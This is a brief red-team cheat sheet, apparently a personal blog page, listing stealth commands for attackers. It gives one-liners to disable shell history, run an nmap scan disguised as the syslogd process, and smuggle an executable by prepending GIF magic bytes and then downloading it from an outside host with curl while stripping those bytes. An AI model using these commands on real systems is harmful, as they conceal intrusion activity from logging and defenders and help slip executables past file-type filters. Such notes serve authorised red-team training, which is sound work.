Red Team

R3zk0n · October 2, 2025

Contents

    Resources

    • https://outflank.nl/blog/2021/04/02/our-reasoning-for-outflank-security-tooling/

    Stealth Tips

    Disable history (do first) - “export HISTFILE=/dev/null”

    Hide a command by masking it as syslogd - “(exec -a syslogd nmap -T0 10.0.2.1/24)”

    Start a background hidden process as syslogd - “exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &”

    Download File

    1.) Rename/insert magic bytes: “sed ‘1s/^/GIF87a/’ calc.exe > calc.gif”

    2.) Download, stripping magic bytes: “curl.exe -qk -X GET -C 6 https://example.com/calc.gif > calc.exe”

    Twitter, Facebook